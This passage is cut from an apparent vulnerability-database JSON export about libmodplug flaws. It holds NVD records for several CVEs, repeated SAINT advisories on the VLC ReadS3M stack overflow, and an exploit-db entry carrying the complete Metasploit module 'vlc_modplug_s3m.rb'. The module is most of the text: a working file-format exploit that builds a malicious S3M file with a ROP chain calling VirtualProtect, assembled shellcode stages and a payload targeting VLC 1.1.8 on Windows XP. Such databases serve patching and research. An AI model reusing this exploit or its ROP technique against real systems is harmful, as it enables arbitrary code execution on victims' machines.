"AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2011-2915"], "modified": "2017-08-29T01:29:00", "cpe": ["cpe:/a:konstanty_bialkowski:libmodplug:0.8.8.3", "cpe:/a:konstanty_bialkowski:libmodplug:0.8.8.2", "cpe:/a:konstanty_bialkowski:libmodplug:0.8", "cpe:/a:konstanty_bialkowski:libmodplug:0.8.4", "cpe:/a:konstanty_bialkowski:libmodplug:0.8.7", "cpe:/a:konstanty_bialkowski:libmodplug:0.8.6", "cpe:/a:konstanty_bialkowski:libmodplug:0.8.8.1", "cpe:/a:konstanty_bialkowski:libmodplug:0.8.5", "cpe:/a:konstanty_bialkowski:libmodplug:0.8.8"], "id": "CVE-2011-2915", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2011-2915", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:konstanty_bialkowski:libmodplug:0.8.5:*:*:*:*:*:*:*", "cpe:2.3:a:konstanty_bialkowski:libmodplug:0.8:*:*:*:*:*:*:*", "cpe:2.3:a:konstanty_bialkowski:libmodplug:0.8.7:*:*:*:*:*:*:*", "cpe:2.3:a:konstanty_bialkowski:libmodplug:0.8.8.2:*:*:*:*:*:*:*", "cpe:2.3:a:konstanty_bialkowski:libmodplug:0.8.8:*:*:*:*:*:*:*", "cpe:2.3:a:konstanty_bialkowski:libmodplug:0.8.6:*:*:*:*:*:*:*", "cpe:2.3:a:konstanty_bialkowski:libmodplug:0.8.8.1:*:*:*:*:*:*:*", "cpe:2.3:a:konstanty_bialkowski:libmodplug:0.8.8.3:*:*:*:*:*:*:*", "cpe:2.3:a:konstanty_bialkowski:libmodplug:0.8.4:*:*:*:*:*:*:*"]}, {"lastseen": "2020-12-09T19:39:09", "description": "Off-by-one error in the CSoundFile::ReadAMS function in src/load_ams.cpp in libmodplug before 0.8.8.4 allows remote attackers to cause a denial of service (stack memory corruption) and possibly execute arbitrary code via a crafted AMS file with a large number of samples.", "edition": 5, "cvss3": {}, "published": "2012-06-07T19:55:00", "title": "CVE-2011-2913", "type": "cve", "cwe": ["CWE-189"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2011-2913"], "modified": "2017-08-29T01:29:00", "cpe": ["cpe:/a:konstanty_bialkowski:libmodplug:0.8.8.3", "cpe:/a:konstanty_bialkowski:libmodplug:0.8.8.2", "cpe:/a:konstanty_bialkowski:libmodplug:0.8", "cpe:/a:konstanty_bialkowski:libmodplug:0.8.4", "cpe:/a:konstanty_bialkowski:libmodplug:0.8.7", "cpe:/a:konstanty_bialkowski:libmodplug:0.8.6", "cpe:/a:konstanty_bialkowski:libmodplug:0.8.8.1", "cpe:/a:konstanty_bialkowski:libmodplug:0.8.5", "cpe:/a:konstanty_bialkowski:libmodplug:0.8.8"], "id": "CVE-2011-2913", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2011-2913", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:konstanty_bialkowski:libmodplug:0.8.5:*:*:*:*:*:*:*", "cpe:2.3:a:konstanty_bialkowski:libmodplug:0.8:*:*:*:*:*:*:*", "cpe:2.3:a:konstanty_bialkowski:libmodplug:0.8.7:*:*:*:*:*:*:*", "cpe:2.3:a:konstanty_bialkowski:libmodplug:0.8.8.2:*:*:*:*:*:*:*", "cpe:2.3:a:konstanty_bialkowski:libmodplug:0.8.8:*:*:*:*:*:*:*", "cpe:2.3:a:konstanty_bialkowski:libmodplug:0.8.6:*:*:*:*:*:*:*", "cpe:2.3:a:konstanty_bialkowski:libmodplug:0.8.8.1:*:*:*:*:*:*:*", "cpe:2.3:a:konstanty_bialkowski:libmodplug:0.8.8.3:*:*:*:*:*:*:*", "cpe:2.3:a:konstanty_bialkowski:libmodplug:0.8.4:*:*:*:*:*:*:*"]}, {"lastseen": "2020-12-09T19:39:09", "description": "Integer overflow in the CSoundFile::ReadWav function in src/load_wav.cpp in libmodplug before 0.8.8.4 allows remote attackers to cause a denial of service and possibly execute arbitrary code via a crafted WAV file, which triggers a heap-based buffer overflow.", "edition": 5, "cvss3": {}, "published": "2012-06-07T19:55:00", "title": "CVE-2011-2911", "type": "cve", "cwe": ["CWE-189"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2011-2911"], "modified": "2017-08-29T01:29:00", "cpe": ["cpe:/a:konstanty_bialkowski:libmodplug:0.8.8.3", "cpe:/a:konstanty_bialkowski:libmodplug:0.8.8.2", "cpe:/a:konstanty_bialkowski:libmodplug:0.8", "cpe:/a:konstanty_bialkowski:libmodplug:0.8.4", "cpe:/a:konstanty_bialkowski:libmodplug:0.8.7", "cpe:/a:konstanty_bialkowski:libmodplug:0.8.6", "cpe:/a:konstanty_bialkowski:libmodplug:0.8.8.1", "cpe:/a:konstanty_bialkowski:libmodplug:0.8.5", "cpe:/a:konstanty_bialkowski:libmodplug:0.8.8"], "id": "CVE-2011-2911", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2011-2911", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:konstanty_bialkowski:libmodplug:0.8.5:*:*:*:*:*:*:*", "cpe:2.3:a:konstanty_bialkowski:libmodplug:0.8:*:*:*:*:*:*:*", "cpe:2.3:a:konstanty_bialkowski:libmodplug:0.8.7:*:*:*:*:*:*:*", "cpe:2.3:a:konstanty_bialkowski:libmodplug:0.8.8.2:*:*:*:*:*:*:*", "cpe:2.3:a:konstanty_bialkowski:libmodplug:0.8.8:*:*:*:*:*:*:*", "cpe:2.3:a:konstanty_bialkowski:libmodplug:0.8.6:*:*:*:*:*:*:*", "cpe:2.3:a:konstanty_bialkowski:libmodplug:0.8.8.1:*:*:*:*:*:*:*", "cpe:2.3:a:konstanty_bialkowski:libmodplug:0.8.8.3:*:*:*:*:*:*:*", "cpe:2.3:a:konstanty_bialkowski:libmodplug:0.8.4:*:*:*:*:*:*:*"]}, {"lastseen": "2020-12-09T19:39:09", "description": "Off-by-one error in the CSoundFile::ReadDSM function in src/load_dms.cpp in libmodplug before 0.8.8.4 allows remote attackers to cause a denial of service (memory corruption) and possibly execute arbitrary code via a crafted DSM file with a large number of samples.", "edition": 5, "cvss3": {}, "published": "2012-06-07T19:55:00", "title": "CVE-2011-2914", "type": "cve", "cwe": ["CWE-189"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2011-2914"], "modified": "2017-08-29T01:29:00", "cpe": ["cpe:/a:konstanty_bialkowski:libmodplug:0.8.8.3", "cpe:/a:konstanty_bialkowski:libmodplug:0.8.8.2", "cpe:/a:konstanty_bialkowski:libmodplug:0.8", "cpe:/a:konstanty_bialkowski:libmodplug:0.8.4", "cpe:/a:konstanty_bialkowski:libmodplug:0.8.7", "cpe:/a:konstanty_bialkowski:libmodplug:0.8.6", "cpe:/a:konstanty_bialkowski:libmodplug:0.8.8.1", "cpe:/a:konstanty_bialkowski:libmodplug:0.8.5", "cpe:/a:konstanty_bialkowski:libmodplug:0.8.8"], "id": "CVE-2011-2914", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2011-2914", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:konstanty_bialkowski:libmodplug:0.8.5:*:*:*:*:*:*:*", "cpe:2.3:a:konstanty_bialkowski:libmodplug:0.8:*:*:*:*:*:*:*", "cpe:2.3:a:konstanty_bialkowski:libmodplug:0.8.7:*:*:*:*:*:*:*", "cpe:2.3:a:konstanty_bialkowski:libmodplug:0.8.8.2:*:*:*:*:*:*:*", "cpe:2.3:a:konstanty_bialkowski:libmodplug:0.8.8:*:*:*:*:*:*:*", "cpe:2.3:a:konstanty_bialkowski:libmodplug:0.8.6:*:*:*:*:*:*:*", "cpe:2.3:a:konstanty_bialkowski:libmodplug:0.8.8.1:*:*:*:*:*:*:*", "cpe:2.3:a:konstanty_bialkowski:libmodplug:0.8.8.3:*:*:*:*:*:*:*", "cpe:2.3:a:konstanty_bialkowski:libmodplug:0.8.4:*:*:*:*:*:*:*"]}, {"lastseen": "2020-12-09T19:39:06", "description": "Stack-based buffer overflow in the ReadS3M method in load_s3m.cpp in libmodplug before 0.8.8.2 allows remote attackers to execute arbitrary code via a crafted S3M file.", "edition": 5, "cvss3": {}, "published": "2011-05-09T22:55:00", "title": "CVE-2011-1574", "type": "cve", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2011-1574"], "modified": "2016-12-08T03:01:00", "cpe": ["cpe:/a:konstanty_bialkowski:libmodplug:0.8", "cpe:/a:konstanty_bialkowski:libmodplug:0.8.4", "cpe:/a:konstanty_bialkowski:libmodplug:0.8.7", "cpe:/a:konstanty_bialkowski:libmodplug:0.8.6", "cpe:/a:konstanty_bialkowski:libmodplug:0.8.8.1", "cpe:/a:konstanty_bialkowski:libmodplug:0.8.5", "cpe:/a:konstanty_bialkowski:libmodplug:0.8.8"], "id": "CVE-2011-1574", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2011-1574", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:konstanty_bialkowski:libmodplug:0.8.5:*:*:*:*:*:*:*", "cpe:2.3:a:konstanty_bialkowski:libmodplug:0.8:*:*:*:*:*:*:*", "cpe:2.3:a:konstanty_bialkowski:libmodplug:0.8.7:*:*:*:*:*:*:*", "cpe:2.3:a:konstanty_bialkowski:libmodplug:0.8.8:*:*:*:*:*:*:*", "cpe:2.3:a:konstanty_bialkowski:libmodplug:0.8.6:*:*:*:*:*:*:*", "cpe:2.3:a:konstanty_bialkowski:libmodplug:0.8.8.1:*:*:*:*:*:*:*", "cpe:2.3:a:konstanty_bialkowski:libmodplug:0.8.4:*:*:*:*:*:*:*"]}], "saint": [{"lastseen": "2016-10-03T15:02:01", "bulletinFamily": "exploit", "cvelist": ["CVE-2011-1574"], "description": "Added: 05/26/2011 \nCVE: [CVE-2011-1574](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1574>) \nOSVDB: [72143](<http://www.osvdb.org/72143>) \n\n\n### Background\n\n[VideoLAN VLC media player](<http://www.videolan.org/vlc/>) is a media player supporting various audio and video formats for multiple platforms. \n\n### Problem\n\nVLC media player is vulnerable to a stack buffer overflow because the ReadS3M() function in libmodplug fails to properly sanitize user-supplied input. A remote attack who entices a user to open a specially crafted file in the vulnerable VLC media player could potentially execute arbitrary code. \n\n### Resolution\n\n[Upgrade](<http://www.videolan.org/vlc/>) to [VLC 1.1.9](<http://www.videolan.org/vlc/releases/1.1.9.html>) or higher. \n\n### References\n\n<http://secunia.com/advisories/44054/> \n\n\n### Limitations\n\nExploit runs on VideoLAN VLC media player 1.1.8. \n\n### Platforms\n\nWindows \n \n\n", "edition": 1, "modified": "2011-05-26T00:00:00", "published": "2011-05-26T00:00:00", "id": "SAINT:114116FE009CEA3405415E74B271E604", "href": "http://www.saintcorporation.com/cgi-bin/exploit_info/vlc_libmodplug_reads3m", "type": "saint", "title": "VLC Media Player Libmodplug CSoundFile::ReadS3M() Function S3M File Handling Overflow", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-05-29T17:19:51", "bulletinFamily": "exploit", "cvelist": ["CVE-2011-1574"], "edition": 2, "description": "Added: 05/26/2011 \nCVE: [CVE-2011-1574](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1574>) \nOSVDB: [72143](<http://www.osvdb.org/72143>) \n\n\n### Background\n\n[VideoLAN VLC media player](<http://www.videolan.org/vlc/>) is a media player supporting various audio and video formats for multiple platforms. \n\n### Problem\n\nVLC media player is vulnerable to a stack buffer overflow because the ReadS3M() function in libmodplug fails to properly sanitize user-supplied input. A remote attack who entices a user to open a specially crafted file in the vulnerable VLC media player could potentially execute arbitrary code. \n\n### Resolution\n\n[Upgrade](<http://www.videolan.org/vlc/>) to [VLC 1.1.9](<http://www.videolan.org/vlc/releases/1.1.9.html>) or higher. \n\n### References\n\n<http://secunia.com/advisories/44054/> \n\n\n### Limitations\n\nExploit runs on VideoLAN VLC media player 1.1.8. \n\n### Platforms\n\nWindows \n \n\n", "modified": "2011-05-26T00:00:00", "published": "2011-05-26T00:00:00", "href": "http://download.saintcorporation.com/cgi-bin/exploit_info/vlc_libmodplug_reads3m", "id": "SAINT:B21ACF2EB9B8F35B9EB742A262AFFAD0", "type": "saint", "title": "VLC Media Player Libmodplug CSoundFile::ReadS3M() Function S3M File Handling Overflow", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-06-04T23:19:38", "bulletinFamily": "exploit", "cvelist": ["CVE-2011-1574"], "description": "Added: 05/26/2011 \nCVE: [CVE-2011-1574](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1574>) \nOSVDB: [72143](<http://www.osvdb.org/72143>) \n\n\n### Background\n\n[VideoLAN VLC media player](<http://www.videolan.org/vlc/>) is a media player supporting various audio and video formats for multiple platforms. \n\n### Problem\n\nVLC media player is vulnerable to a stack buffer overflow because the ReadS3M() function in libmodplug fails to properly sanitize user-supplied input. A remote attack who entices a user to open a specially crafted file in the vulnerable VLC media player could potentially execute arbitrary code. \n\n### Resolution\n\n[Upgrade](<http://www.videolan.org/vlc/>) to [VLC 1.1.9](<http://www.videolan.org/vlc/releases/1.1.9.html>) or higher. \n\n### References\n\n<http://secunia.com/advisories/44054/> \n\n\n### Limitations\n\nExploit runs on VideoLAN VLC media player 1.1.8. \n\n### Platforms\n\nWindows \n \n\n", "edition": 4, "modified": "2011-05-26T00:00:00", "published": "2011-05-26T00:00:00", "id": "SAINT:ECB5BDC1AA42880516325F32A021D963", "href": "https://my.saintcorporation.com/cgi-bin/exploit_info/vlc_libmodplug_reads3m", "title": "VLC Media Player Libmodplug CSoundFile::ReadS3M() Function S3M File Handling Overflow", "type": "saint", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "exploitdb": [{"lastseen": "2016-02-02T07:30:41", "description": "VideoLAN VLC ModPlug ReadS3M Stack Buffer Overflow. CVE-2011-1574. Remote exploit for windows platform", "published": "2011-04-08T00:00:00", "type": "exploitdb", "title": "VideoLAN VLC ModPlug ReadS3M Stack Buffer Overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2011-1574"], "modified": "2011-04-08T00:00:00", "id": "EDB-ID:17252", "href": "https://www.exploit-db.com/exploits/17252/", "sourceData": "##\r\n# $Id: vlc_modplug_s3m.rb 12282 2011-04-08 15:48:53Z jduck $\r\n##\r\n\r\n##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. Please see the Metasploit\r\n# Framework web site for more information on licensing and terms of use.\r\n# http://metasploit.com/framework/\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n\tRank = AverageRanking\r\n\r\n\tinclude Msf::Exploit::FILEFORMAT\r\n\r\n\tdef initialize(info = {})\r\n\t\tsuper(update_info(info,\r\n\t\t\t'Name' => 'VideoLAN VLC ModPlug ReadS3M Stack Buffer Overflow',\r\n\t\t\t'Description' => %q{\r\n\t\t\t\t\tThis module exploits an input validation error in libmod_plugin as\r\n\t\t\t\tincluded with VideoLAN VLC 1.1.8. All versions prior to version 1.1.9\r\n\t\t\t\tare affected. By creating a malicious S3M file, a remote attacker\r\n\t\t\t\tcould execute arbitrary code.\r\n\r\n\t\t\t\tAlthough other products that bundle libmodplug may be vulnerable, this\r\n\t\t\t\tmodule was only tested against VLC.\r\n\r\n\t\t\t\tNOTE: As of July 1st, 2010, VLC now calls SetProcessDEPPoly to\r\n\t\t\t\tpermanently enable NX support on machines that support it. As such,\r\n\t\t\t\tthis module is capable of bypassing DEP, but not ASLR.\r\n\t\t\t},\r\n\t\t\t'License' => MSF_LICENSE,\r\n\t\t\t'Author' => [ 'jduck' ],\r\n\t\t\t'Version' => '$Revision: 12282 $',\r\n\t\t\t'References' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'CVE', '2011-1574' ],\r\n\t\t\t\t\t[ 'OSVDB', '72143' ],\r\n\t\t\t\t\t#[ 'BID', 'xxx' ],\r\n\t\t\t\t\t[ 'URL', 'http://modplug-xmms.git.sourceforge.net/git/gitweb.cgi?p=modplug-xmms/modplug-xmms;a=commitdiff;h=aecef259828a89bb00c2e6f78e89de7363b2237b' ],\r\n\t\t\t\t\t[ 'URL', 'http://hackipedia.org/File%20formats/Music/html/s3mformat.php' ],\r\n\t\t\t\t\t[ 'URL', 'https://www.sec-consult.com/files/20110407-0_libmodplug_stackoverflow.txt' ],\r\n\t\t\t\t\t[ 'URL', 'http://seclists.org/fulldisclosure/2011/Apr/113' ]\r\n\t\t\t\t],\r\n\t\t\t'Payload' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'Space'\t\t=> 512 - 0x24, # Space reserved for prepended mutex code\r\n\t\t\t\t\t#'DisableNops'\t=> true,\r\n\t\t\t\t},\r\n\t\t\t'Platform' => 'win',\r\n\t\t\t'Targets' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'VLC 1.1.8 on Windows XP SP3',\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t# vuln is in libmod_plugin.dll, rop is custom to this module\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t],\r\n\t\t\t\t],\r\n\t\t\t'Privileged' => false,\r\n\t\t\t'DisclosureDate' => 'Apr 07, 2011', # \"found: 2011-03-09\"\r\n\t\t\t'DefaultTarget' => 0))\r\n\r\n\t\tregister_options(\r\n\t\t\t[\r\n\t\t\t\tOptString.new('FILENAME', [ true, 'The file name.', 'msf.s3m']),\r\n\t\t\t], self.class)\r\n\tend\r\n\r\n\tdef exploit\r\n\r\n\t\tnum_orders = 0x14\r\n\t\tnum_instru = 0x15\r\n\t\tnum_patterns = 0x18\r\n\r\n\t\thdr = \"\\x00\" * 0x1c # song name (none)\r\n\t\thdr << [\r\n\t\t\t0x1a, # static byte\r\n\t\t\t0x10, # ST3 module\r\n\t\t\t0x00, # padding\r\n\t\t\tnum_orders,\r\n\t\t\tnum_instru,\r\n\t\t\tnum_patterns,\r\n\t\t\t0x00, # Flags\r\n\t\t\t0x1320, # Created with (which tracker)\r\n\t\t\t0x02, # File format information\r\n\t\t].pack('CCvvvvvvv')\r\n\t\thdr << \"SCRM\"\r\n\r\n\t\thdr << [\r\n\t\t\t0x40, # global volume\r\n\t\t\t0x06, # initial speed\r\n\t\t\t0x8a, # initial tempo\r\n\t\t\t0xb0, # master volume\r\n\t\t\t0x10, # ultra click removal\r\n\t\t\t0xfb # NOTE, non-0xfc value skips an additional loop!\r\n\t\t\t# 0xfc == default channel pan positions present\r\n\t\t].pack('CCCCCC')\r\n\t\thdr << \"\\x00\" * 10 # includes pad and special pointer\r\n\r\n\t\t# channel settings (for 32 channels)\r\n\t\thdr << \"\\x00\\x08\\x01\\x09\\x02\\x0a\\x03\\x0b\\x04\\x0c\\x05\\x0d\\x06\\x0e\\x07\\x0f\"\r\n\t\thdr << \"\\xff\" * 16\r\n\r\n\t\t# orders\r\n\t\thdr << \"\\x07\\x08\\x0c\\x09\\x0a\\x0b\\x0b\\x0d\\x0e\\x0f\\x0f\\x0f\\x10\\x11\\x12\\x13\"\r\n\t\thdr << \"\\x14\\x16\\x17\\xff\"\r\n\r\n\t\t# parapointers to instruments\r\n\t\thdr << [ 0x0f ].pack('v') * num_instru\r\n\r\n\t\t# parapoitners to patterns\r\n\t\thdr << [ 0x78 ].pack('v') * num_patterns\r\n\r\n\t\t# channel default pan positions\r\n\t\thdr << \"\\x00\" * 32\r\n\r\n\t\t# instruments\r\n\t\tinstru = \"\\x01metasplo.ity\"\r\n\t\trest = \"\\x00\" * ((0x50 * num_instru) - instru.length)\r\n\r\n\t\t# Build the rop stack\r\n\t\trvas = rvas_libmod_plugin_xpsp3()\r\n\t\trop = generate_rop(rvas)\r\n\t\tzero_ptr = rva2addr(rvas, 'Scratch') + 4\r\n\t\tmutex_addr = rva2addr(rvas, 'Scratch') + 8\r\n\t\timp_Sleep = rva2addr(rvas, 'imp_Sleep')\r\n\r\n\t\t# A mutex to prevent double payloads\r\n\t\tlocking_code = <<-EOS\r\n\tmov ebx, [ #{imp_Sleep} ]\r\n\tjmp test_lock\r\n\r\nsleep:\r\n\tpush 0xdeadbeef\r\n\tcall ebx\r\n\r\ntest_lock:\r\n\tmov eax, [ #{mutex_addr} ]\r\n\ttest eax,eax\r\n\tjnz sleep\r\n\r\n\tlock cmpxchg [ #{mutex_addr} ], ebp\r\n\ttest eax,eax\r\n\tjnz sleep\r\n\r\nEOS\r\n\t\trop << Metasm::Shellcode.assemble(Metasm::Ia32.new, locking_code).encode_string\r\n\t\trop << payload.encoded\r\n\r\n\t\t# This becomes the new EIP (after return)\r\n\t\tret = rva2addr(rvas, 'pop eax / ret')\r\n\t\trest[1267, 4] = [ ret ].pack('V')\r\n\r\n\t\t# In order to force return, we smash the this ptr on the stack and point\r\n\t\t# it so that m_nChannels turns out to be 0.\r\n\t\trest[1271, 4] = [ zero_ptr - 0xe910 ].pack('V')\r\n\r\n\t\t# Add the ROP stack and final payload here\r\n\t\trest[1275, rop.length] = rop\r\n\t\tinstru << rest\r\n\r\n\t\t# patterns\r\n\t\tpatt = [ 0x10 ].pack('v')\r\n\t\tpatt << \"\\x00\" * 0x10\r\n\r\n\r\n\t\t# finalize the file\r\n\t\ts3m = \"\"\r\n\t\ts3m << hdr\r\n\r\n\t\tinstru_pad = (0x0f * 0x10) - hdr.length\r\n\t\ts3m << \"\\x80\" * instru_pad\r\n\t\ts3m << instru\r\n\r\n\r\n\t\t# patch in exploit trigger values\r\n\t\ts3m[0x22, 2] = [ 0x220 ].pack('v')\r\n\t\ts3m[0x24, 2] = [ 0x220 ].pack('v')\r\n\r\n\r\n\t\tprint_status(\"Creating '#{datastore['FILENAME']}' file ...\")\r\n\r\n\t\tfile_create(s3m)\r\n\r\n\tend\r\n\r\n\tdef rvas_libmod_plugin_xpsp3()\r\n\t\t# libmod_plugin.dll from VLC 1.1.8 (Win32)\r\n\t\t# Just return this hash\r\n\t\t{\r\n\t\t\t# Used as 'Ret' for target\r\n\t\t\t'ret' => 0x1022,\r\n\t\t\t'push eax / ret' => 0x1cc4d,\r\n\t\t\t'pop eax / ret' => 0x598a2,\r\n\t\t\t'mov eax, [eax+0x1c] / ret' => 0x542c9,\r\n\t\t\t'pop ebx / pop ebp / ret' => 0x25e2f,\r\n\t\t\t'add eax, 4 / pop ebp / ret' => 0x7028,\r\n\t\t\t'mov [eax+0x58], ebx / pop ebx / pop esi / pop edi / pop ebp / ret' => 0x23dad,\r\n\t\t\t'sub eax, ebx / pop ebx / pop edi / pop ebp / ret' => 0x7d64,\r\n\t\t}\r\n\tend\r\n\r\n\tdef generate_rop(rvas)\r\n\t\t# ROP fun! (XP SP3 English, Apr 10 2011)\r\n\t\trvas.merge!({\r\n\t\t\t# Instructions / Name => RVA\r\n\t\t\t'BaseAddress' => 0x653c0000,\r\n\t\t\t'imp_VirtualProtect' => 0xec2f0 - 0x1c, # adjust for gadget used to resolve\r\n\t\t\t'imp_Sleep' => 0xec2dc,\r\n\t\t\t'Scratch' => 0x5fbfc,\r\n\t\t\t'Data' => 0x60101,\r\n\t\t\t#'DataAdjusted' => 0x60000 - 0x58 + 0x8,\r\n\t\t\t'DataAdjusted' => 0x60000 - 0x58,\r\n\t\t})\r\n\r\n\t\tcopy_stage = <<-EOS\r\n\tnop\r\n\tpush esp\r\n\tpop esi\r\n\tlea edi, [eax+0x10]\r\n\tpush 0x7f\r\n\tpop ecx\r\n\tinc ecx\r\n\trep movsd\r\nEOS\r\n\t\tcopy_stage = Metasm::Shellcode.assemble(Metasm::Ia32.new, copy_stage).encode_string\r\n\t\tif (copy_stage.length % 4) > 0\r\n\t\t\traise RuntimeError, \"The copy stage is invalid\"\r\n\t\tend\r\n\r\n\t\trop_stack = [\r\n\t\t\t# Resolve VirtualProtect\r\n\t\t\t'pop eax / ret',\r\n\t\t\t'imp_VirtualProtect',\r\n\t\t\t'mov eax, [eax+0x1c] / ret',\r\n\r\n\t\t\t# Call VirtuaProtect\r\n\t\t\t'push eax / ret',\r\n\t\t\t'pop eax / ret', # after VirtualProtect\r\n\t\t\t# Args to VirtualProtect\r\n\t\t\t'Data', # lpAddress (place holder, filled in @ runtime above)\r\n\t\t\t0x1000, # dwSize\r\n\t\t\t0x40, # flNewProtect\r\n\t\t\t'Scratch', # lpflOldProtect\r\n\r\n\t\t\t# Load the pre-adjusted Data addr\r\n\t\t\t'DataAdjusted', # matches pop eax / ret above\r\n\r\n\t\t\t##\r\n\t\t\t# Write our code little stager to our newly executable memory.\r\n\t\t\t##\r\n\r\n\t\t\t# Load the last 32-bits of code to write\r\n\t\t\t'pop ebx / pop ebp / ret',\r\n\t\t\tcopy_stage[0, 4].unpack('V').first,\r\n\t\t\t:unused, # ebp\r\n\r\n\t\t\t# Write & advance\r\n\t\t\t'mov [eax+0x58], ebx / pop ebx / pop esi / pop edi / pop ebp / ret',\r\n\t\t\tcopy_stage[4, 4].unpack('V').first,\r\n\t\t\t:unused, # esi\r\n\t\t\t:unused, # edi\r\n\t\t\t:unused, # ebp\r\n\t\t\t'add eax, 4 / pop ebp / ret',\r\n\t\t\t:unused, # ebp\r\n\r\n\t\t\t# Write & advance\r\n\t\t\t'mov [eax+0x58], ebx / pop ebx / pop esi / pop edi / pop ebp / ret',\r\n\t\t\tcopy_stage[8, 4].unpack('V').first,\r\n\t\t\t:unused, # esi\r\n\t\t\t:unused, # edi\r\n\t\t\t:unused, # ebp\r\n\t\t\t'add eax, 4 / pop ebp / ret',\r\n\t\t\t:unused, # ebp\r\n\r\n\t\t\t# Write & advance\r\n\t\t\t'mov [eax+0x58], ebx / pop ebx / pop esi / pop edi / pop ebp / ret',\r\n\t\t\t0xffffffb0, # adjustment value\r\n\t\t\t:unused, # esi\r\n\t\t\t:unused, # edi\r\n\t\t\t:unused, # ebp\r\n\r\n\t\t\t# Adjust eax\r\n\t\t\t'sub eax, ebx / pop ebx / pop edi / pop ebp / ret',\r\n\t\t\t:unused, # ebx\r\n\t\t\t:unused, # edi\r\n\t\t\t:unused, # ebp\r\n\r\n\t\t\t# Execute the copy stage\r\n\t\t\t'push eax / ret',\r\n\t\t]\r\n\r\n\t\trop_stack.map! { |e|\r\n\t\t\tif e.kind_of? String\r\n\t\t\t\t# Meta-replace (RVA)\r\n\t\t\t\traise RuntimeError, \"Unable to locate key: \\\"#{e}\\\"\" if not rvas[e]\r\n\t\t\t\trvas['BaseAddress'] + rvas[e]\r\n\r\n\t\t\telsif e == :unused\r\n\t\t\t\t# Randomize\r\n\t\t\t\trand_text(4).unpack('V').first\r\n\r\n\t\t\telse\r\n\t\t\t\t# Literal\r\n\t\t\t\te\r\n\t\t\tend\r\n\t\t}\r\n\r\n\t\trop_stack.pack('V*')\r\n\tend\r\n\r\n\tdef rva2addr(rvas, key)\r\n\t\traise RuntimeError, \"Unable to locate key: \\\"#{key}\\\"\" if not rvas[key]\r\n\t\trvas['BaseAddress'] + rvas[key]\r\n\tend\r\n\r\nend\r\n", "cvss": 